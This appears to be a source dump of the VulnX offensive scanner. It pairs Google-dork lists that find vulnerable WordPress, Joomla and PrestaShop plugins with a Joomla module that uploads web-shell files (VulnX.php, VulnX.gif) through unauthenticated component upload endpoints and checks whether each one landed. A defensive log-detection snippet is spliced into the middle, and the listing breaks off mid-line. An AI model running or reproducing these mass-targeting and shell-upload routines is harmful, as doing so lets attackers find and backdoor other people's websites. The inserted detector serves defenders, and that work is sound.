21 |
22 |
23 | wp_contentdorks = {
24 | 'blaze' : 'inurl:"/wp-content/plugins/blaze-slide-show-for-wordpress/"',
25 | 'catpro' : 'inurl:"/wp-content/plugins/wp-catpro/"',
26 | 'cherry' : 'inurl:"/wp-content/plugins/cherry-plugin/"',
27 | 'dm' : 'inurl:"/wp-content/plugins/downloads-manager/"',
28 | 'fromcraft' : 'inurl:"/wp-content/plugins/formcraft/file-upload/"',
29 | 'synoptic' : 'inurl:"/wp-content/themes/synoptic/lib/avatarupload"',
30 | 'shop' : 'inurl:"/wp-content/plugins/wpshop/includes/"',
31 | 'revslider' : 'inurl "/wp-content/plugins/revslider/"',
32 | 'adsmanager' : 'inurl:"/wp-content/plugins/simple-ads-manager/"',
33 | 'inboundiomarketing': 'inurl:"/wp-content/plugins/inboundio-marketing/"',
34 | 'thumbslider' : 'inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider"',
35 | }
36 | wp_admindorks = {
37 | 'wysija' : 'inurl":/wp-admin/admin-post.php?page=wysija_campaigns"',
38 | 'powerzoomer' : 'inurl:"/wp-admin/admin.php?page=powerzoomer_manage"',
39 | 'showbiz' : 'inurl:"/wp-admin/admin-ajax.php"',
40 | }
41 |
42 | wpajx = {
43 | 'jobmanager' : 'inurl:"/jm-ajax/upload_file/"',
44 | }
45 |
46 |
47 | wpindex = {
48 | 'injection' : 'inurl:"/index.php/wp-json/wp/"',
49 | }
50 |
51 |
52 | joomla = {
53 | 'comjce' : 'inurl":index.php?option=com_jce"',
54 | 'comfabrik' : 'inurl":index.php?option=com_fabrik"',
55 | 'comjdownloads' : 'inurl":index.php?option=com_fabrik"',
56 | 'comfoxcontact' : 'inurl":index.php?option=com_foxcontact"',
57 | }
58 |
59 | prestashop = {
60 | 'columnadverts' : 'inurl":/modules/columnadverts/"',
61 | 'soopabanners' : 'inurl":/modules/soopabanners/"',
62 | 'vtslide' : 'inurl":/modules/soopabanners/"',
63 | 'simpleslideshow' : 'inurl":/modules/simpleslideshow/"',
64 | 'productpageadverts' : 'inurl":/modules/productpageadverts/"',
65 | 'productpageadvertsb' : 'inurl":/modules/homepageadvertise2/"',
66 | 'jro_homepageadvertise' : 'inurl":/modules/jro_homepageadvertise/"',
67 | 'attributewizardpro' : 'inurl":/modules/attributewizardpro/"',
68 | 'oneattributewizardpro' : 'inurl":/modules/1attributewizardpro/"',
69 | 'attributewizardpro_old' : 'inurl":/modules/attributewizardpro.OLD/"',
70 | 'attributewizardpro_x' : 'inurl":/modules/attributewizardpro_x/"',
71 | 'advancedslider' : 'inurl":/modules/advancedslider/"',
72 | 'cartabandonmentpro' : 'inurl":/modules/cartabandonmentpro/"',
73 | 'cartabandonmentpro_old' : 'inurl":/modules/cartabandonmentproOld/"' ,
74 | 'videostab' : 'inurl":/modules/videostab/"',
75 | 'wg24themeadministration': 'inurl":/modules//wg24themeadministration/"',
76 | 'fieldvmegamenu' : 'inurl":/modules/fieldvmegamenu/"',
77 | 'wdoptionpanel' : 'inurl":/modules/wdoptionpanel/"',
78 | 'pk_flexmenu' : 'inurl":/modules/pk_flexmenu/"',
79 | 'pk_vertflexmenu' : 'inurl":/modules/pk_vertflexmenu/"',
80 | 'nvn_export_orders' : 'inurl":/modules/nvn_export_orders/"',
81 | 'tdpsthemeoptionpanel' : 'inurl":/modules/tdpsthemeoptionpanel/"',
82 | 'masseditproduct' : 'inurl":/modules/lib/redactor/"',
83 | }
84 |
85 | class Dorks:
86 |
87 | @staticmethod
88 | def getdorksbyname(exploitname):
89 | if exploitname in wp_contentdorks:
90 | return wp_contentdorks[exploitname]
91 | elif exploitname in wp_admindorks:
92 | return wp_admindorks[exploitname]
93 | elif exploitname in wpajx:
94 | return wpajx[exploitname]
95 | elif exploitname in wpindex:
96 | return wpindex[exploitname]
97 | elif exploitname in joomla:
98 | return joomla[exploitname]
99 | elif exploitname in prestashop:
100 | return prestashop[exploitname]
101 |
102 | @staticmethod
103 | def searchengine(exploitname,headers,output_dir,numberpage):
104 | try :
105 | print (' %s Searching for %s dork url' %(run,exploitname))
106 | numberpage = numberpage*10
107 | for np in range(0,numberpage,10):
108 | starty = time.time()
109 | if np==0:
110 | time.sleep(random.randint(1,2))
111 | print(' %s Page n° 1 ' % (info))
112 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)
113 | print(' %s searching for : %s'% (que,googlequery))
114 | res = requests.get(googlequery,headers).text
115 | if (re.findall(re.compile(r'CAPTCHA'),res)):
116 | print(' %s Bot Detected The block will expire shortly' % bad)
117 | else:
118 | Dorks.WP_dorksconditions(exploitname,res,output_dir)
119 | print ('------------------------------------------------')
120 | else:
121 | time.sleep(random.randint(3,5))
122 | print(' %s Page n° %i ' % (info,np/10+1))
123 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)+'&start='+str(np)
124 | res = requests.get(googlequery,headers).text
125 | print(' %s searching for : %s'% (que,googlequery))
126 | if (re.findall(re.compile(r'CAPTCHA'),res)):
127 | print(' %s Bot Detected The block will expire shortly' % bad)
128 | else:
129 | Dorks.WP_dorksconditions(exploitname,res,output_dir)
130 | print ('------------------------------------------------')
131 | endy = time.time()
132 | elapsed = endy - starty
133 | print (' %s Elapsed Time : %.2f seconds' % (info,elapsed))
134 | print("%s----------------%s"%(bannerblue,end))
135 | export.close()
136 | except Exception as msg:
137 | print(' %s exploitname %s ' %(bad,msg))
138 | np=+10
139 |
140 | @staticmethod
141 | def WP_dorksconditions(exploitname,response,output_dir):
142 | webs = []
143 | if exploitname in wp_contentdorks:
144 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-content/plugins/\w+'),response)
145 | if len(dorks) > 0:
146 | for web in dorks:
147 | if web not in webs:
148 | webs.append(web)
149 | for i in range(len(webs)):
150 | domains = parsify(webs[i])
151 | print (' %s URL : %s ' %(good , webs[i]))
152 | print (' %s DOMAIN: %s ' %(good , domains))
153 | export.write(domains)
154 | export.write('\n')
155 | elif exploitname in wp_admindorks:
156 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-admin/\w+'),response)
157 | if len(dorks) > 0:
158 | for web in dorks:
159 | if web not in webs:
160 | webs.append(web)
161 | for i in range(len(webs)):
162 | domains = parsify(webs[i])
163 | print (' %s URL : %s ' %(good , webs[i]))
164 | print (' %s DOMAIN: %s ' %(good , domains))
165 | export.write(domains)
166 | export.write('\n')
167 | elif exploitname in wpajx:
168 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/jm-ajax/upload_file/'),response)
169 | if len(dorks) > 0:
170 | for web in dorks:
171 | if web not in webs:
172 | webs.append(web)
173 | for i in range(len(webs)):
174 | domains = parsify(webs[i])
175 | print (' %s URL : %s ' %(good , webs[i]))
176 | print (' %s DOMAIN: %s ' %(good , domains))
177 | export.write(domains)
178 | export.write('\n')
179 | elif exploitname in wpindex:
180 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php/wp-json/wp/'),response)
181 | if len(dorks) > 0:
182 | for web in dorks:
183 | if web not in webs:
184 | webs.append(web)
185 | for i in range(len(webs)):
186 | domains = parsify(webs[i])
187 | print (' %s URL : %s ' %(good , webs[i]))
188 | print (' %s DOMAIN: %s ' %(good , domains))
189 | export.write(domains)
190 | export.write('\n')
191 | elif exploitname in joomla:
192 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php?option=com_jce'),response)
193 | if len(dorks) > 0:
194 | for web in dorks:
195 | if web not in webs:
196 | webs.append(web)
197 | for i in range(len(webs)):
198 | domains = parsify(webs[i])
199 | print (' %s URL : %s ' %(good , webs[i]))
200 | print (' %s DOMAIN: %s ' %(good , domains))
201 | export.write(domains)
202 | export.write('\n')
203 | elif exploitname in prestashop:
204 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/modules/\w+'),response)
205 | if len(dorks) > 0:
206 | for web in dorks:
207 | if web not in webs:
208 | webs.append(web)
209 | for i in range(len(webs)):
210 | domains = parsify(webs[i])
211 | print (' %s URL : %s ' %(good , webs[i]))
212 | print (' %s DOMAIN: %s ' %(good , domains))
213 | export.write(domains)
214 | export.write('\n')
215 |
216 | class DorkList():
217 |
218 | @staticmethod
219 | def dorkslist():
220 | print("""
221 | %sWordPress Joomla Prestashop
222 | --------- ------ -----------%s
223 | blaze comjce columnadverts
224 | catpro comfabrik soopabanners
225 | cherry comjdownloads vtslide
226 | dm comfoxcontact simpleslideshow
227 | fromcraft productpageadverts
228 | synoptic productpageadvertsb
229 | shop jro_homepageadvertise
230 | revslider attributewizardpro
231 | adsmanager oneattributewizardpro
232 | inboundiomarketing attributewizardpro_old
233 | wysija attributewizardpro_x
234 | powerzoomer advancedslider
235 | showbiz cartabandonmentpro
236 | jobmanager cartabandonmentpro_old
237 | injection videostab
238 | thumbslider wg24themeadministration
239 | fieldvmegamenu
240 | wdoptionpanel
241 | pk_flexmenu
242 | pk_vertflexmenu
243 | nvn_export_orders
244 | tdpsthemeoptionpanel
245 | masseditproduct
246 | """%(W,end))
247 |
248 |
249 |
250 | @staticmethod
251 | def wp_dorkTable():
252 | print("""
253 | WordPress
254 | ---------
255 | blaze
256 | catpro
257 | cherry
258 | dm
259 | fromcraft
260 | synoptic
261 | shop
262 | revslider
263 | adsmanager
264 | inboundiomarketing
265 | wysija
266 | powerzoomer
267 | showbiz
268 | jobmanager
269 | injection
270 | thumbslider
271 | """)
272 |
273 | @staticmethod
274 | def joo_dorkTable():
275 | print("""
276 | Joomla
277 | ------
278 | comjce
279 | comfabrik
280 | comjdownloads
281 | comfoxcontact
282 | """)
283 |
284 | @staticmethod
285 | def ps_dorkTable():
286 |
287 | print("""
288 | Prestashop
289 | -----------
290 | columnadverts
291 | soopabanners
292 | vtslide
293 | simpleslideshow
294 | productpageadverts
295 | productpageadvertsb
296 | jro_homepageadvertise
297 | attributewizardpro
298 | oneattributewizardpro
299 | attributewizardpro_old
300 | attributewizardpro_x
301 | advancedslider
302 | cartabandonmentpro
303 | cartabandonmentpro_old
304 | videostab
305 | wg24themeadministration
306 | fieldvmegamenu
307 | wdoptionpanel
308 | pk_flexmenu
309 | pk_vertflexmenu
310 | nvn_export_orders
311 | tdpsthemeoptionpanel
312 | masseditproduct
313 | """)
314 |
315 | @staticmethod
316 | def loko_dorkTable():
317 | print("""
318 | Lokomedia
319 | ------
320 | """)
321 |
322 | @staticmethod
323 | def dru_dorkTable():
324 | print("""
325 | Drupal
326 | ------
327 | """)
--------------------------------------------------------------------------------
/modules/druExploits.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import datetime
4 | import requests
5 | from common.uriParser import parsing_url as hostd
6 | now = datetime.datetime.now()
7 | year = now.strftime('%Y')
8 | month= now.strftime('%m')
9 |
10 | import os
11 | Session = requests.Session()
12 |
13 | from common.colors import failexploit , vulnexploit , que , info , good
14 | from common.requestUp import sendrequest as vxpost
15 | from common.requestUp import getrequest as vxget
16 |
--------------------------------------------------------------------------------
/modules/jooExploits.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import datetime
4 | import requests
5 | now = datetime.datetime.now()
6 | year = now.strftime('%Y')
7 | month= now.strftime('%m')
8 |
9 | import os
10 | Session = requests.Session()
11 |
12 | from common.colors import failexploit , vulnexploit , que , info , good
13 |
14 | def com_jce(url,headers):
15 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
16 | endpoint = url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
17 | data = {
18 | 'upload-dir':'./../../',
19 | 'upload-overwrite':0,
20 | 'Filedata' : [open('shell/VulnX.gif','rb')],
21 | 'action':'Upload',
22 | }
23 | content = Session.post(endpoint,data,headers)
24 | path_shell = url + "/VulnX.gif"
25 | res=requests.get(path_shell, headers).text
26 | matches = re.findall(re.compile(r'/image/gif/'),res)
27 | if matches:
28 | print (' %s com_jce %s %s' %(que,vulnexploit,path_shell))
29 | else:
30 | print (' %s com_jce %s' %(que , failexploit))
31 |
32 | def com_media(url,headers):
33 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
34 | endpoint = url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
35 | headers={"content-type":["form-data"]}
36 | fieldname = 'Filedata[]'
37 | shell = open('shell/VulnX.txt','rb')
38 | data = {
39 | fieldname:shell,
40 | }
41 | content = Session.post(endpoint,data,headers)
42 | path_shell = endpoint+"/images/XAttacker.txt"
43 | response = requests.get(path_shell,headers).text
44 | if re.findall(r'Tig', response):
45 | print (' %s com_media %s %s' %(que,vulnexploit,path_shell))
46 | else:
47 | print (' %s com_media %s' %(que , failexploit))
48 |
49 |
50 | #def com_jdownloads(url,headers):
51 | # endpoint = url+"index.php?option=com_jdownloads&Itemid=0&view=upload"
52 | # files = open('shell/VulnX.zip','rb')
53 | # shell = open('shell/VulnX.gif','rb')
54 | # data = {
55 | # 'name' : 'Tig',
56 | # 'mail' :'tig@tig.com',
57 | # 'filetitle' :'Tig',
58 | # 'catlist':'1',
59 | # 'license':'0',
60 | # 'language':'0',
61 | # 'system':'0',
62 | # 'file_upload': files,
63 | # 'pic_upload':shell,
64 | # 'description':'zot',
65 | # 'senden':'Send file',
66 | # 'option':'com_jdownloads',
67 | # 'view':'upload',
68 | # 'send':'1',
69 | # '24c22896d6fe6977b731543b3e44c22f':'1',
70 | # }
71 | # upload_file = Session.post(endpoint,data)
72 | # path_shell = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
73 | # response = requests.get(path_shell).text
74 | # if re.findall(r'Vuln X', response):
75 | # print (' %s com_jdownloads %s %s' %(que,vulnexploit,path_shell))
76 | # else:
77 | # print (' %s com_jdownloads %s' %(que , failexploit))
78 |
79 | #def com_jdownloadsb(url,headers):
80 | # headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
81 | # endpoint = url+"/images/jdownloads/screenshots/VulnX.php"
82 | # headers={"content-type":["form-data"]}
83 | # files = open('shell/VulnX.zip','rb')
84 | # shell = open('shell/VulnX.gif','rb')
85 | # data = {
86 | # 'name' : 'Tig',
87 | # 'mail' :'tig@tig.com',
88 | # 'filetitle' :'Tig',
89 | # 'catlist':'1',
90 | # 'license':'0',
91 | # 'language':'0',
92 | # 'system':'0',
93 | # 'file_upload': files,
94 | # 'pic_upload':shell,
95 | # 'description':'zot',
96 | # 'senden':'Send file',
97 | # 'option':'com_jdownloads',
98 | # 'view':'upload',
99 | # 'send':'1',
100 | # '24c22896d6fe6977b731543b3e44c22f':'1'
101 | # }
102 | # response = requests.get(endpoint,headers).text
103 | # if re.findall(r'200', response):
104 | # print (' %s com_jdownloads2 %s %s' %(que,vulnexploit,endpoint))
105 | # else:
106 | # print (' %s com_jdownloads2 %s' %(que , failexploit))
107 |
108 | def com_fabrika(url,headers):
109 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
110 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
111 |
112 | headers={"content-type":["form-data"]}
113 | fieldname = 'file'
114 | shell = open('shell/VulnX.php','rb')
115 | data = {
116 | fieldname:shell,
117 | }
118 | content = Session.post(endpoint,data,headers)
119 | path_shell = endpoint+"/images/XAttacker.txt"
120 | response = requests.get(path_shell,headers).text
121 | if re.findall(r'Vuln X', response):
122 | print (' %s com_fabrik1 %s %s' %(que,vulnexploit,path_shell))
123 | else:
124 | print (' %s com_fabrik1 %s' %(que , failexploit))
125 |
126 | def com_fabrikb(url,headers):
127 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
128 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
129 |
130 | headers={"content-type":["form-data"]}
131 | fieldname = 'file'
132 | shell = open('shell/VulnX.txt','rb')
133 | data = {
134 | fieldname:shell,
135 | }
136 | content = Session.post(endpoint,data,headers)
137 | path_shell = endpoint+"/images/XAttacker.txt"
138 | response = requests.get(path_shell,headers).text
139 | if re.findall(r'Tig', response):
140 | print (' %s com_fabrik2 %s %s' %(que,vulnexploit,path_shell))
141 | else:
142 | print (' %s com_fabrik2 %s' %(que , failexploit))
143 |
144 | def com_foxcontact(url,headers):
145 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
146 | # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
147 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
148 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
149 | # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
150 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
151 |
152 | headers={"content-type":["form-data"]}
153 | fieldname = 'file'
154 | shell = open('shell/VulnX.txt','rb')
155 | data = {
156 | fieldname:shell,
157 | }
158 | content = Session.post(endpoint,data,headers)
159 | path_shell = endpoint+"/images/XAttacker.txt"
160 | response = requests.get(path_shell,headers).text
161 | if re.findall(r'Tig', response):
162 | print (' %s com_foxcontact %s %s' %(que,vulnexploit,path_shell))
163 | else:
164 | print (' %s com_foxcontact %s' %(que , failexploit))
165 |
166 | def com_adsmanager(url,headers):
167 | endpoint = url + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
168 | img = open('shell/VulnX.php', 'rb')
169 | name_img= os.path.basename('shell/VulnX.html')
170 | files= {'image': (name_img,img,'form-data',{'Expires': '0'}) }
171 | upload_file = Session.post(endpoint,files=files)
172 | shellup = url + "/tmp/plupload/VulnX.html"
173 | checkShell = requests.get(shellup).text
174 | statusCheck = re.findall(re.compile(r'VulnX'),checkShell)
175 | if statusCheck:
176 | print(' %s com_adsmanager %s %s' %(que,vulnexploit,shellup))
177 | else:
178 | print(' %s com_adsmanager %s' %(que , failexploit))
179 |
180 | def com_blog(url,headers):
181 | endpoint = url + "/index.php?option=com_myblog&task=ajaxupload"
182 | checkShell = requests.get(endpoint).text
183 | statusCheck = re.findall(re.compile(r'has been uploaded'),endpoint)
184 | if statusCheck:
185 | print(' %s com_blog %s %s' %(que,vulnexploit,endpoint))
186 | else:
187 | print(' %s com_blog %s' %(que , failexploit))
188 |
189 | def com_users(url,headers):
190 | endpoint = url + "/index.php?option=com_users&view=registration"
191 | checkShell = requests.get(endpoint).text
192 | statusCheck = re.findall(re.compile(r'jform_email2-lbl'),endpoint)
193 | if statusCheck:
194 | print(' %s com_users %s %s' %(que,vulnexploit,endpoint))
195 | else:
196 | print(' %s com_users %s' %(que , failexploit))
197 |
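Seen from the web server's side, the functions above leave a recognisable pair of requests: a POST to a component upload endpoint, then a GET for the file it tried to drop. The following Python detector is an added example, not part of the VulnX repository; it flags that pair in combined-format access logs. The log lines, the `classify` function and the verdict labels are constructed for illustration, while the query parameters and probe paths are taken from the listing above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters copied from the upload endpoints in modules/jooExploits.py.
UPLOAD_SIGNATURES = {
    "com_jce": {"option": "com_jce", "plugin": "imgmanager", "method": "form"},
    "com_fabrik": {"option": "com_fabrik", "method": "ajax_upload"},
    "com_adsmanager": {"option": "com_adsmanager", "task": "upload"},
}
# Paths the module fetches afterwards to confirm that its file landed.
PROBE_PATHS = ("/VulnX.gif", "/tmp/plupload/VulnX.html")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), combined log format.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /index.php?option=com_jce'
    '&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /VulnX.gif HTTP/1.1" 200 43 "-" "-"',
    '198.51.100.9 - - [10/Oct/2023:14:01:02 +0000] "POST /index.php?option=com_adsmanager'
    '&task=upload&tmpl=component HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [10/Oct/2023:14:01:03 +0000] "GET /tmp/plupload/VulnX.html HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.50 - - [10/Oct/2023:14:05:00 +0000] "GET /index.php?option=com_content&view=article HTTP/1.1" 200 900 "-" "-"',
]

def classify(lines):
    """Map client IP -> uploads tried, probe fetches seen, and a verdict."""
    clients = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        parts = urlsplit(m["target"])
        query = {k: v[0] for k, v in parse_qs(parts.query).items()}
        rec = clients.setdefault(m["ip"], {"uploads": [], "probes": []})
        if m["method"] == "POST":
            rec["uploads"] += [name for name, sig in UPLOAD_SIGNATURES.items()
                               if all(query.get(k) == v for k, v in sig.items())]
        elif m["method"] == "GET" and parts.path.endswith(PROBE_PATHS):
            rec["probes"].append((parts.path, int(m["status"])))
    flagged = {}
    for ip, rec in clients.items():
        if rec["uploads"] or rec["probes"]:
            landed = rec["uploads"] and any(s == 200 for _, s in rec["probes"])
            flagged[ip] = {**rec, "verdict": "upload-confirmed" if landed else "attempt"}
    return flagged
```

An `upload-confirmed` verdict means the probe path answered 200 after an upload POST from the same client, so the named file should be located and removed and the component patched or disabled; `attempt` covers uploads or probes that did not succeed.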
198 | def comweblinks(url,headers):
199 | endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author="
200 | token = re.findall(re.compile(r'